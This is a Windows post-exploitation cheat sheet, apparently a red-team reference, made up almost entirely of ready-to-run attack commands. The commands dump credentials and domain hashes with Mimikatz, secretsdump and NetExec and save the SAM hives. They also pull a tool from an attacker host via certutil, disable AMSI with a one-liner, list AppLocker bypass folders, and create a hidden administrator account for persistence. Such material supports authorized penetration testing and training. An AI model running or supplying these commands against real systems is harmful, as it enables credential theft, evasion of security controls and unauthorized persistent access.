Windows-Post-Exploitation
Windows post-exploitation — dump credentials with Mimikatz and secretsdump, extract hashes, AMSI bypass, WinPEAS enumeration, and persistence via user creation.
Shell
-
# --- Mimikatz credential dumping --- # Enable debug privilege mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit mimikatz.exe "privilege::debug" "lsadump::sam" exit mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:senshu.local /all /csv" exit # --- Impacket secretsdump (from attacker) --- impacket-secretsdump senshu.local/sec_user:'P@ssw0rd'@10.10.10.27 impacket-secretsdump -just-dc senshu.local/sec_user:'P@ssw0rd'@10.10.10.27 # --- NetExec credential extraction --- nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --sam nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --lsa nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --dpapi nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --wifi nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --ntds nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' -M lsassy nxc ldap 10.10.10.27 -u sec_user -p 'P@ssw0rd' --gmsa # --- Offline SAM dump --- # Save registry hives on target reg save HKLM\SAM C:\Temp\SAM reg save HKLM\SYSTEM C:\Temp\SYSTEM # Dump offline with samdump2 (on attacker) samdump2 SYSTEM SAM # --- File transfer with certutil --- certutil -urlcache -f http://10.10.10.21:8000/winpeas.exe C:\Temp\winpeas.exe # --- Enumeration tools --- # WinPEAS .\winpeas.exe # Seatbelt .\Seatbelt.exe -group=all # --- AMSI Bypass (run before loading tools in PowerShell) --- [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) # --- AppLocker bypass paths (writable by default) --- # C:\Windows\Tasks\ # C:\Windows\Temp\ # C:\Windows\Tracing\ # --- Persistence: add admin user and grant access --- net user hacker P@ssw0rd /add net localgroup Administrators hacker /add net localgroup "remote desktop users" hacker /add net localgroup "Remote Management Users" hacker /add
https://github.com/gentilkiwi/mimikatz
https://github.com/fortra/impacket
https://github.com/peass-ng/PEASS-ng